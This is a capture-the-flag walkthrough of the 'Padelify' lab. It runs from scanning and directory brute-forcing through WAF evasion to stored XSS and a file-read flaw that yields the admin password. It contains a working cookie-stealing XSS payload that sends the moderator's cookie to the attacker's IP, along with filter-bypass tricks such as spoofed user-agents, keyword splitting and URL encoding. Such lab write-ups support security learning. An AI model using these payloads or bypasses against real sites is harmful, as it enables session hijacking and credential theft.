# Padelify

* Ran a TCP scan using Nmap on the target and found two open ports i.e 22 and 80.

```
nmap -sC -sV -p 22,80 10.48.132.157
```

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Padelify - Tournament Registration
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.33 seconds

```

* Next, the webpage on port 80 showed the following

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2Ff0DxuU5q74v2uxYEMOuP%2Fimage.png?alt=media&#x26;token=3523efcf-a9b4-4219-812f-959055cbce7a" alt=""><figcaption></figcaption></figure>

* Next, I tried to run a directory scan via Gobuster but the WAF was blocking the requests with a 403 Forbidden error.
* I manually added a fake user-agent in GoBuster and successfully carried out the directory scan.

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.48.132.157 -a "Mozilla/5.0 (Linux; Android 12; PSD-
AL00 Build/HUAWEIPSD-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/99.0.4844.88 Mobile Safari/537.36"
```

* You can use any user-agent to mimic a legitimate source and to bypass the firewall.&#x20;
* I found the following directories in the scan.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FRyhXJcQ5keAp3I6Qhe1j%2Fimage.png?alt=media&#x26;token=7a01a161-f7c9-4a51-9248-7645a70d742d" alt=""><figcaption></figcaption></figure>

* `/logs` and `/config` seemed interesting.
* `/config` had an `app.conf` file which the WAF was restricting me to open.
* `/logs` opened the following directory having a file `error.log`&#x20;

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FK76dx72NqZQIaKiAcNUS%2Fimage.png?alt=media&#x26;token=e4d7ec1d-d21c-4c12-a315-b6319e1b595b" alt=""><figcaption></figcaption></figure>

* The `error.log` file had the following contents.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2Fakqk8o9YOMsbKC1ILgfn%2Fimage.png?alt=media&#x26;token=e9d4425f-bf60-4077-8773-32e85fc49ac2" alt=""><figcaption></figcaption></figure>

* If we check the error logs then we can learn that there was an XSS attempt made previously. From this we can learn that maybe the site is vulnerable to XSS and we can make use of it if we use the correct payload despite having a WAF.&#x20;
* I went to the login page and tried using XSS payloads.
* It was clearly written on the page that a moderator would approve our registration, hence we could attempt to steal moderator cookies and get elevated access.
* I first started a HTTP server on my attacker machine as port 8000.

```
python3 -m http.server 8000
```

* Next, I used the following payload to check XSS.

```
<img src='http://10.48.79.213:8000/burp.json'>
```

* So basically, I had a `burp.json` file in my working directory and the above payload would execute in the moderator's page due to XSS which would send a GET request to my HTTP server. This was just to verify the vulnerability of XSS.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FtRQlH13lkTU3YR69hMMa%2Fimage.png?alt=media&#x26;token=c0467f7a-0d4b-4812-b5a3-ed4225982b45" alt=""><figcaption></figcaption></figure>

* After that, I tried several different payloads to steal moderator cookies and realized that&#x20;
  * `<script>` tags are blocked
  * `cookie` word is specifically blocked
  * `<img>` tag with `onload` or `onerror` attribute wasn't working
* I even tried using HTML Entity Encoding on the payloads but they got detected by the WAF as well.
* Next, I tried using `<iframe>` tags along with `onload` attribute.&#x20;

```
<iframe onload="new Image().src='http://10.48.79.213:1234?x='+document['coo'+'kie']">
```

* I used `document['coo'+'kie'` specifically to evade the WAF blocking the term `cookie` . The above payload was injected to steal the moderator cookies and return them to my machine.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FDQgZbkrAriedGl6ACrcm%2Fimage.png?alt=media&#x26;token=a072c121-c8d9-4abc-b37b-86d43021344e" alt=""><figcaption></figcaption></figure>

* As you can see, I had successfully stolen the moderator cookies using XSS which I could use to elevate my privileges.&#x20;
* You can use several different variations of the XSS payload above. In some write-ups you will see `<body>` tag being used instead of `<iframe>`.&#x20;
* Now, I went to the Storage tab in Inspect elements and replaced the normal cookie with the moderator's.&#x20;

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FgKlGr8XBHzX5kOSEWL1w%2Fimage.png?alt=media&#x26;token=6e23bf31-8b51-458f-8e5c-c92a17c04e7b" alt=""><figcaption></figcaption></figure>

* Upon doing so, I was redirected to the dashboard and received the first flag.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FiwB7jA8AgMycXG32loSh%2Fimage.png?alt=media&#x26;token=89aa7290-55a8-47be-9e18-a769d7f3cb34" alt=""><figcaption></figcaption></figure>

## Admin Flag

* I clicked on the Live option on the navigation bar from the dashboard.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FiQQh45rzyGChPQxzKeW7%2Fimage.png?alt=media&#x26;token=4a25d732-da18-492b-846b-806bf614dea6" alt=""><figcaption></figcaption></figure>

* The link had a GET parameter `page` with the value as `match.php`. This instantly gave me an idea of trying out SSRF (Server-Side Request Forgery) on the target.
* I used a very generic `/etc/passwd` payload but it got flagged by the WAF.
* Next, I recollected seeing an `app.conf` file inside the `config` folder which I couldn't open due to WAF restrictions.
* I tried using `/config/app.conf` in the GET parameter and again got blocked by the WAF.
* But then I used URL encoding in Burp Suite as follows.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FhhrgpzotWFuERcCXzmvv%2Fimage.png?alt=media&#x26;token=ebbfe672-346b-4259-917a-5cabca5e4abc" alt=""><figcaption></figcaption></figure>

* I converted `/config/app.conf` to a URL encoded format and sent the request to which I got the following result.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FUA9Fs2Y7rq9FOmlbWjCU%2Fimage.png?alt=media&#x26;token=5adc0025-0810-423a-a4f9-e979d35aeb2e" alt=""><figcaption></figcaption></figure>

* Here you can see we have `admin_info = "bL}8,S9W1o44"`&#x20;
* I went to `/login.php` and used the credentials `admin:bL}8,S9W1o44`&#x20;

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FZrdgtZGgPXfLmA2zrQBt%2Fimage.png?alt=media&#x26;token=eac739f5-8db8-42ff-bd5d-4cb9aaf27af0" alt=""><figcaption></figcaption></figure>

* And as you can see, we successfully elevated to the admin dashboard and got the admin flag.